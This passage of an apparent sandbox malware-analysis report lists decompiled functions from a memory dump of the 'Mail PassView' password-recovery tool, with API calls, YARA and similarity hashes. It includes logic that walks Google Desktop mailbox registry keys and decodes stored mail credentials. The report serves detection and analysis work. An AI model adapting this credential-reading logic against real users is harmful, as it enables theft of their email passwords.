                                                                                              					_t122 = _t86 - 0x9c41;
                                                                                              					if(_t86 == 0x9c41) {
                                                                                              						_t54 = E0040AD38(_t104, _t93, _t122);
                                                                                              					}
                                                                                              					if(_t86 != 0x9c47) {
                                                                                              						L23:
                                                                                              						__eflags = _t86 - 0x9c4f;
                                                                                              						if(_t86 != 0x9c4f) {
                                                                                              							L27:
                                                                                              							__eflags = _t86 - 0x9c48;
                                                                                              							if(_t86 == 0x9c48) {
                                                                                              								_t54 = E0040AC8A(_t104, _t86);
                                                                                              							}
                                                                                              							__eflags = _t86 - 0x9c45;
                                                                                              							if(__eflags == 0) {
                                                                                              								_t100 = _t104 + 0x36c;
                                                                                              								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
                                                                                              								E0040A27F(0, _t93, _t104, __eflags);
                                                                                              								_t93 = 1;
                                                                                              								_t54 = E0040A00B( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
                                                                                              								_t97 = 0;
                                                                                              								__eflags = 0;
                                                                                              							}
                                                                                              							__eflags = _a8 - 0x9c46;
                                                                                              							if(__eflags == 0) {
                                                                                              								_t54 = E0040B095(_t104, __eflags, _t97);
                                                                                              							}
                                                                                              							__eflags = _a8 - 0x9c5c;
                                                                                              							if(_a8 == 0x9c5c) {
                                                                                              								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
                                                                                              								__eflags = 0;
                                                                                              								E0040A27F(0, _t93, _t104, 0);
                                                                                              								E0040A437(_t104);
                                                                                              								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
                                                                                              							}
                                                                                              							__eflags = _a8 - 0x9c4a;
                                                                                              							if(__eflags == 0) {
                                                                                              								_t54 = E0040B095(_t104, __eflags, 1);
                                                                                              							}
                                                                                              							__eflags = _a8 - 0x9c4b;
                                                                                              							if(_a8 == 0x9c4b) {
                                                                                              								_v540 = _t97;
                                                                                              								_v560 = 0x412ff4;
                                                                                              								E00405960( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
                                                                                              								_v568 = 0x412ff4;
                                                                                              								_t54 = E0040143D( &_v560);
                                                                                              								_t104 = _v572;
                                                                                              							}
                                                                                              							__eflags = _a8 - 0x9c4c;
                                                                                              							if(_a8 == 0x9c4c) {
                                                                                              								_t54 = E00408C3E( *((intOrPtr*)(_t104 + 0x370)));
                                                                                              							}
                                                                                              							__eflags = _a8 - 0x9c4e;
                                                                                              							if(_a8 == 0x9c4e) {
                                                                                              								_t54 = E00409C78( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
                                                                                              							}
                                                                                              							goto L43;
                                                                                              						}
                                                                                              						_t72 =  *((intOrPtr*)(_t104 + 0x370));
                                                                                              						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
                                                                                              						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
                                                                                              							_t54 = E00408654(_t72, 0xffffffff, _t97, 2);
                                                                                              							goto L27;
                                                                                              						}
                                                                                              						_push(0xf000);
                                                                                              						_push(0x1000);
                                                                                              						goto L21;
                                                                                              					} else {
                                                                                              						_t72 =  *((intOrPtr*)(_t104 + 0x370));
                                                                                              						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
                                                                                              							_t54 = E00408654(_t72, 0xffffffff, 2, 2);
                                                                                              							goto L23;
                                                                                              						}
                                                                                              						_push(0xf000);
                                                                                              						_push(0x2000);
                                                                                              						L21:
                                                                                              						_push(0xffffffff);
                                                                                              						_t54 = E00408654(_t72);
                                                                                              						goto L43;
                                                                                              					}
                                                                                              				} else {
                                                                                              					L43:
                                                                                              					return _t54;
                                                                                              				}
                                                                                              			}





















                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?), ref: 0040B13E
                                                                                              • SetFocus.USER32(?,?,?), ref: 0040B1E4
                                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B2E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DestroyFocusInvalidateRectWindow
                                                                                              • String ID: `5A
                                                                                              • API String ID: 3502187192-343712130
                                                                                              • Opcode ID: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                                              • Instruction ID: 7dc3b259c8ef6dbe6f4b6ee630ad47b8a618685bd7b93527759b10f323b3e488
                                                                                              • Opcode Fuzzy Hash: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                                              • Instruction Fuzzy Hash: 2B519130A043019BCB25BF658845E9AB3E0EF54724F44C57FF4696F2E1CB7999818B8E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E00405CEE(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                              				struct HDWP__* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				void* __ebx;
                                                                                              				intOrPtr _t29;
                                                                                              				struct HDWP__* _t30;
                                                                                              				RECT* _t58;
                                                                                              				intOrPtr _t66;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_push(__ecx);
                                                                                              				_t66 = __ecx;
                                                                                              				_v12 = __ecx;
                                                                                              				if(_a4 != 5) {
                                                                                              					if(_a4 != 0x24) {
                                                                                              						if(_a4 == 0xf) {
                                                                                              							E0040173B(__ecx + 0xc);
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t29 = _a12;
                                                                                              						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
                                                                                              						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t30 = BeginDeferWindowPos(0xb);
                                                                                              					_t58 = _t66 + 0xc;
                                                                                              					_v8 = _t30;
                                                                                              					E0040169B(_t58, _t30, 0x3ed, 0, 0, 1);
                                                                                              					E0040169B(_t58, _v8, 0x3ee, 0, 0, 1);
                                                                                              					E0040169B(_t58, _v8, 0x3f4, 0, 0, 1);
                                                                                              					E0040169B(_t58, _v8, 0x3ef, 0, 0, 1);
                                                                                              					E0040169B(_t58, _v8, 0x3f0, 1, 0, 0);
                                                                                              					E0040169B(_t58, _v8, 0x3f1, 1, 0, 0);
                                                                                              					E0040169B(_t58, _v8, 0x3f5, 1, 0, 0);
                                                                                              					E0040169B(_t58, _v8, 0x3f2, 1, 0, 0);
                                                                                              					E0040169B(_t58, _v8, 0x3f3, 1, 1, 0);
                                                                                              					E0040169B(_t58, _v8, 1, 1, 1, 0);
                                                                                              					E0040169B(_t58, _v8, 2, 1, 1, 0);
                                                                                              					EndDeferWindowPos(_v8);
                                                                                              					InvalidateRect( *(_t58 + 0x10), _t58, 1);
                                                                                              					_t66 = _v12;
                                                                                              				}
                                                                                              				return E004015AE(_t66, _a4, _a8, _a12);
                                                                                              			}











                                                                                              APIs
                                                                                              • BeginDeferWindowPos.USER32 ref: 00405D07
                                                                                                • Part of subcall function 0040169B: GetDlgItem.USER32 ref: 004016AB
                                                                                                • Part of subcall function 0040169B: GetClientRect.USER32 ref: 004016BD
                                                                                                • Part of subcall function 0040169B: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401727
                                                                                              • EndDeferWindowPos.USER32(?), ref: 00405DD8
                                                                                              • InvalidateRect.USER32(?,?,00000001), ref: 00405DE3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                              • String ID: $
                                                                                              • API String ID: 2498372239-3993045852
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040719C(void* __ecx, intOrPtr _a4) {
                                                                                              				void _v259;
                                                                                              				char _v260;
                                                                                              				char _v264;
                                                                                              				void* _v268;
                                                                                              				void* _v276;
                                                                                              				long _t17;
                                                                                              				void* _t21;
                                                                                              				void* _t24;
                                                                                              				void* _t29;
                                                                                              				int _t32;
                                                                                              				signed int _t36;
                                                                                              				void* _t39;
                                                                                              				void* _t40;
                                                                                              				void* _t41;
                                                                                              
                                                                                              				_t29 = __ecx;
                                                                                              				_t17 = E0040EB3F(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
                                                                                              				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
                                                                                              				if(_t17 == 0) {
                                                                                              					_t32 = 0;
                                                                                              					_v260 = 0;
                                                                                              					memset( &_v259, 0, 0xff);
                                                                                              					_t40 = _t39 + 0xc;
                                                                                              					_t21 = E0040EC05(_v268, 0,  &_v260);
                                                                                              					while(1) {
                                                                                              						_t41 = _t40 + 0xc;
                                                                                              						if(_t21 != 0) {
                                                                                              							break;
                                                                                              						}
                                                                                              						_t24 = E0040EB3F(_v268,  &_v260,  &_v264);
                                                                                              						_t40 = _t41 + 0xc;
                                                                                              						if(_t24 == 0) {
                                                                                              							E0040706C(_t29, _a4, _v264,  &_v260);
                                                                                              							RegCloseKey(_v276);
                                                                                              						}
                                                                                              						_t32 = _t32 + 1;
                                                                                              						_t21 = E0040EC05(_v268, _t32,  &_v260);
                                                                                              					}
                                                                                              					_t17 = RegCloseKey(_v268);
                                                                                              				}
                                                                                              				return _t17;
                                                                                              			}


















                                                                                              APIs
                                                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                              • memset.MSVCRT ref: 004071D7
                                                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407225
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407242
                                                                                              Strings
                                                                                              • Software\Google\Google Desktop\Mailboxes, xrefs: 004071AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close$EnumOpenmemset
                                                                                              • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                              • API String ID: 2255314230-2212045309
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040B70A(void* __esi) {
                                                                                              				struct _WNDCLASSA _v44;
                                                                                              				struct HINSTANCE__* _t15;
                                                                                              				struct HWND__* _t20;
                                                                                              
                                                                                              				_t15 =  *0x416b94; // 0x400000
                                                                                              				_v44.hInstance = _t15;
                                                                                              				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104));
                                                                                              				_v44.lpszClassName = __esi + 4;
                                                                                              				_v44.style = 0;
                                                                                              				_v44.lpfnWndProc = E004017C1;
                                                                                              				_v44.cbClsExtra = 0;
                                                                                              				_v44.cbWndExtra = 0;
                                                                                              				_v44.hCursor = 0;
                                                                                              				_v44.hbrBackground = 0x10;
                                                                                              				_v44.lpszMenuName = 0;
                                                                                              				RegisterClassA( &_v44);
                                                                                              				_t20 = CreateWindowExA(0, "MailPassView", "Mail PassView", 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x416b94, __esi);
                                                                                              				 *(__esi + 0x108) = _t20;
                                                                                              				return _t20;
                                                                                              			}







                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ClassCreateRegisterWindow
                                                                                              • String ID: Mail PassView$MailPassView
                                                                                              • API String ID: 3469048531-1277648965
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00401085(void* __esi, void* __eflags) {
                                                                                              				struct tagLOGFONTA _v64;
                                                                                              				int _t10;
                                                                                              				long _t11;
                                                                                              
                                                                                              				E00406191( &_v64, "MS Sans Serif", 0xa, 1);
                                                                                              				_t10 = CreateFontIndirectA( &_v64);
                                                                                              				 *(__esi + 0x20c) = _t10;
                                                                                              				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
                                                                                              				if( *0x417388 != 0) {
                                                                                              					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
                                                                                              				}
                                                                                              				return _t11;
                                                                                              			}







                                                                                              APIs
                                                                                                • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                                                • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                                              • CreateFontIndirectA.GDI32(?), ref: 004010A4
                                                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
                                                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                                                              • String ID: MS Sans Serif
                                                                                              • API String ID: 4251605573-168460110
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040DE43(void** __eax, struct HWND__* _a4) {
                                                                                              				int _t6;
                                                                                              				void** _t10;
                                                                                              
                                                                                              				_t10 = __eax;
                                                                                              				if( *0x417510 == 0) {
                                                                                              					memcpy(0x416e70,  *__eax, 0x50);
                                                                                              					memcpy(0x416ba0,  *(_t10 + 4), 0x2cc);
                                                                                              					 *0x417510 = 1;
                                                                                              					_t6 = DialogBoxParamA( *0x416b94, 0x6b, _a4, E0040DB39, 0);
                                                                                              					 *0x417510 =  *0x417510 & 0x00000000;
                                                                                              					 *0x416b9c = _t6;
                                                                                              					return 1;
                                                                                              				} else {
                                                                                              					return 1;
                                                                                              				}
                                                                                              			}






                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpy$DialogParam
                                                                                              • String ID: V7
                                                                                              • API String ID: 392721444-2959985473
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 58%
                                                                                              			E004062D1(struct HWND__* _a4) {
                                                                                              				void _v259;
                                                                                              				char _v260;
                                                                                              				signed int _t10;
                                                                                              
                                                                                              				_v260 = 0;
                                                                                              				memset( &_v259, 0, 0xff);
                                                                                              				GetClassNameA(_a4,  &_v260, 0xff);
                                                                                              				_t10 =  &_v260;
                                                                                              				_push("edit");
                                                                                              				_push(_t10);
                                                                                              				L004115B2();
                                                                                              				asm("sbb eax, eax");
                                                                                              				return  ~_t10 + 1;
                                                                                              			}







                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004062F1
                                                                                              • GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                                              • _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ClassName_stricmpmemset
                                                                                              • String ID: edit
                                                                                              • API String ID: 3665161774-2167791130
                                                                                              • Opcode ID: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                                              • Instruction ID: 6efc07277a00def775dca084f59963aaad452a70fda198cb5006c56c80a8bddd
                                                                                              • Opcode Fuzzy Hash: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                                              • Instruction Fuzzy Hash: 75E09BB3C4412A7ADB21A764DC05FE53BAC9F59305F0001B6BD46E10D5E5B497C887A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040EDAC() {
                                                                                              				struct HINSTANCE__* _t1;
                                                                                              				_Unknown_base(*)()* _t2;
                                                                                              
                                                                                              				if( *0x417520 == 0) {
                                                                                              					_t1 = LoadLibraryA("shell32.dll");
                                                                                              					 *0x417520 = _t1;
                                                                                              					if(_t1 != 0) {
                                                                                              						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
                                                                                              						 *0x41751c = _t2;
                                                                                              						return _t2;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t1;
                                                                                              			}






                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,75144DE0,?,00000000), ref: 0040EDBA
                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                              • API String ID: 2574300362-543337301
                                                                                              • Opcode ID: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                                              • Instruction ID: 9298da647e7f97f850720a93b521a1101e1548fa407b312faad19db7241a3124
                                                                                              • Opcode Fuzzy Hash: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                                              • Instruction Fuzzy Hash: 4BD0C970649202EFC7008F21AE097813ABABB18703F10C537A506E1AA0F7B88190CF5C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 87%
                                                                                              			E0040FE05(intOrPtr* __esi, void* __eflags) {
                                                                                              				void* _t27;
                                                                                              				intOrPtr _t28;
                                                                                              				intOrPtr* _t29;
                                                                                              				intOrPtr* _t44;
                                                                                              
                                                                                              				_t44 = __esi;
                                                                                              				 *__esi = 0x414288;
                                                                                              				_t27 = E00406549(0x46c, __esi);
                                                                                              				_push(0x20);
                                                                                              				L004115D0();
                                                                                              				if(_t27 == 0) {
                                                                                              					_t28 = 0;
                                                                                              				} else {
                                                                                              					_t28 = E00406A2C(_t27);
                                                                                              				}
                                                                                              				_push(0x20);
                                                                                              				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
                                                                                              				L004115D0();
                                                                                              				if(_t28 == 0) {
                                                                                              					_t29 = 0;
                                                                                              				} else {
                                                                                              					_t29 = E00406A2C(_t28);
                                                                                              				}
                                                                                              				_push(0x14);
                                                                                              				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
                                                                                              				L004115D0();
                                                                                              				if(_t29 == 0) {
                                                                                              					_t29 = 0;
                                                                                              				} else {
                                                                                              					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                                                              					 *_t29 = 0;
                                                                                              					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                              					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                                                              					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                              				}
                                                                                              				_push(0x14);
                                                                                              				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
                                                                                              				L004115D0();
                                                                                              				if(_t29 == 0) {
                                                                                              					_t29 = 0;
                                                                                              				} else {
                                                                                              					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                                                              					 *_t29 = 0;
                                                                                              					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                              					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                                                              					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                              				}
                                                                                              				_push(0x14);
                                                                                              				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
                                                                                              				L004115D0();
                                                                                              				if(_t29 == 0) {
                                                                                              					_t29 = 0;
                                                                                              				} else {
                                                                                              					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                                                              					 *_t29 = 0;
                                                                                              					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                              					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                                                              					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
                                                                                              				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
                                                                                              				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
                                                                                              				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
                                                                                              				 *((intOrPtr*)(_t44 + 0x40)) = 1;
                                                                                              				 *((intOrPtr*)(_t44 + 0x44)) = 1;
                                                                                              				 *((intOrPtr*)(_t44 + 0x48)) = 1;
                                                                                              				return _t44;
                                                                                              			}








                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$memset
                                                                                              • String ID:
                                                                                              • API String ID: 1860491036-0
                                                                                              • Opcode ID: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                                              • Instruction ID: d938b1c2a289ef47e5423cea375f2860c04713c819a512dfc676868f3ea794ac
                                                                                              • Opcode Fuzzy Hash: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                                              • Instruction Fuzzy Hash: CC3146B0A107008FD7609F3AD845666FBE4EF80355F25887FD20ADB6B2E7B8D4448B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040BD0B(void* __edi, void* __esi, void* _a4) {
                                                                                              				signed int _t13;
                                                                                              				signed int _t25;
                                                                                              				int _t26;
                                                                                              				char* _t30;
                                                                                              				void* _t31;
                                                                                              				void* _t33;
                                                                                              				void* _t35;
                                                                                              
                                                                                              				_t35 = __esi;
                                                                                              				_t25 = 0x3f;
                                                                                              				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
                                                                                              				_t30 = __esi + 0x18 + _t13;
                                                                                              				 *_t30 = 0x80;
                                                                                              				_t26 = _t25 - _t13;
                                                                                              				_t31 = _t30 + 1;
                                                                                              				if(_t26 >= 8) {
                                                                                              					memset(_t31, 0, _t26 + 0xfffffff8);
                                                                                              				} else {
                                                                                              					memset(_t31, 0, _t26);
                                                                                              					_t33 = __esi + 0x18;
                                                                                              					E0040BD8A(_t33, __esi);
                                                                                              					memset(_t33, 0, 0x38);
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
                                                                                              				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
                                                                                              				E0040BD8A(_t35 + 0x18, _t35);
                                                                                              				memcpy(_a4, _t35, 0x10);
                                                                                              				return memset(_t35, 0, 4);
                                                                                              			}











                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Similarity
                                                                                              • API ID: memset$memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 368790112-0
                                                                                              • Opcode ID: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                                              • Instruction ID: 14e83d3a51f9c3b731822f35bbce0da2433a64988b134a744f8d54487411a0b4
                                                                                              • Opcode Fuzzy Hash: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                                              • Instruction Fuzzy Hash: 6F01F5B1680B0026D2356B26CC02F9A77A5AFA0714F000B1EF643666D1D7ACE244869C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040246C(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
                                                                                              				void _v2058;
                                                                                              				char _v2060;
                                                                                              				char _v2069;
                                                                                              				char _v2070;
                                                                                              				char _v2071;
                                                                                              				char _v2072;
                                                                                              				char _v3086;
                                                                                              				signed char _v3090;
                                                                                              				char _v3091;
                                                                                              				char _v3092;
                                                                                              				char* _v3096;
                                                                                              				char _v3100;
                                                                                              				short* _v3104;
                                                                                              				int _v3108;
                                                                                              				char _v3112;
                                                                                              				void* __ebx;
                                                                                              				void* _t49;
                                                                                              				signed int _t61;
                                                                                              				short* _t76;
                                                                                              				void* _t83;
                                                                                              				signed int _t87;
                                                                                              				void* _t90;
                                                                                              
                                                                                              				_t83 = __eax;
                                                                                              				_t73 = 0;
                                                                                              				 *_a12 = 0;
                                                                                              				_v3112 = 0x400;
                                                                                              				_t49 = E0040EBA3(__ecx, _a4, _a8,  &_v3092,  &_v3112);
                                                                                              				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
                                                                                              				if(_t49 == 0) {
                                                                                              					_v2069 = 0;
                                                                                              					_v2070 = 0;
                                                                                              					_v2071 = 0;
                                                                                              					_v2072 = 0;
                                                                                              					if(_v3092 != 1) {
                                                                                              						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
                                                                                              							_v3100 = _v3112 - 1;
                                                                                              							_v3096 =  &_v3091;
                                                                                              							if(E00404811(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
                                                                                              								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
                                                                                              								LocalFree(_v3104);
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
                                                                                              							if(_a16 == 0) {
                                                                                              								E0040E988(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
                                                                                              							} else {
                                                                                              								_v2060 = 0;
                                                                                              								memset( &_v2058, 0, 0x800);
                                                                                              								_t90 = _t90 + 0xc;
                                                                                              								_t76 =  &_v2060;
                                                                                              								E0040E988(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
                                                                                              								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
                                                                                              							}
                                                                                              							_t73 = 0;
                                                                                              						}
                                                                                              						_t79 = _a12;
                                                                                              						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
                                                                                              							_t61 = _v3090 & 0x000000ff;
                                                                                              							if(_t61 > 1 && _v3112 >= _t61 + 6) {
                                                                                              								E00401DFD(_t79,  &_v3086, _t61);
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return 0 |  *_a12 != _t73;
                                                                                              			}


























                                                                                              APIs
                                                                                                • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 0040252C
                                                                                              • memset.MSVCRT ref: 004024F5
                                                                                                • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                                                • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                                                • Part of subcall function 0040E988: memcpy.MSVCRT ref: 0040EA04
